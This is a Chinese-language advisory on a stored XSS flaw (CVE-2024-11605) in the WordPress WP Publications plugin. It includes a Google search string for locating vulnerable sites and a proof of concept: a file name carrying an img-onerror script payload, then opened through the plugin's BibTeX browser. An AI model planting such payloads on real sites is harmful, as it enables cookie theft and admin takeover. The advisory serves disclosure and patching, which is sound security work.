WordPress Plugin WP Publications <= 1.2 - Admin+ Stored XSS
发布日期:2025.09.04
提交者: Zeynalxan Quliyev, Ravan Poladli
风险等级:低
本地利用:否
远程利用:是
CVE编号:CVE-2024-11605
CWE编号:N/A
搜索关键字:inurl:/wp-content/plugins/wp-publications/
漏洞标题:WordPress Plugin WP Publications <= 1.2 - 管理员权限存储型XSS
Google搜索关键字:inurl:/wp-content/plugins/wp-publications/
披露日期:2025-07-15
漏洞提交者:Zeynalxan Quliyev, Ravan Poladli
官方主页:https://wordpress.org/plugins/wp-publications/
软件下载链接:https://downloads.wordpress.org/plugin/wp-publications.1.2.zip
受影响版本:<= 1.2
测试环境:WordPress 6.5.3 / Linux (Apache)
CVE编号:CVE-2024-11605
漏洞详情
WordPress的WP Publications插件(版本<=1.2)存在一处存储型跨站脚本(XSS) 漏洞。该漏洞源于插件在将文件名输出到HTML之前未能进行转义处理,使得高权限用户(例如管理员)可以注入任意的JavaScript代码。
即使在禁用了unfiltered_html功能的WordPress配置(例如多站点环境)中,此漏洞仍然可以成功利用。
概念验证(PoC)
-
通过SSH登录服务器并导航到插件目录:
1cd /var/www/html/wp-content/plugins/wp-publications/ -
运行以下命令创建一个恶意的BibTeX文件:
1touch "<img src=x onerror=alert('XSS')>.bib" -
通过以下URL访问插件的BibTeX浏览器:
1https://example.com/wp-content/plugins/wp-publications/bibtexbrowser.php?frameset&bib= -
注入的JavaScript将被执行,触发XSS载荷:
1alert('XSS');
影响
- 存储型XSS(JavaScript)代码在管理面板的上下文中执行。
- 在多站点环境中可以绕过
unfiltered_html保护。 - 可用于权限提升、窃取Cookie或注入恶意内容。
修复建议
更新到在输出前能正确转义文件名的插件版本。如果没有可用更新,请禁用该插件或手动清理文件输入。
参考链接: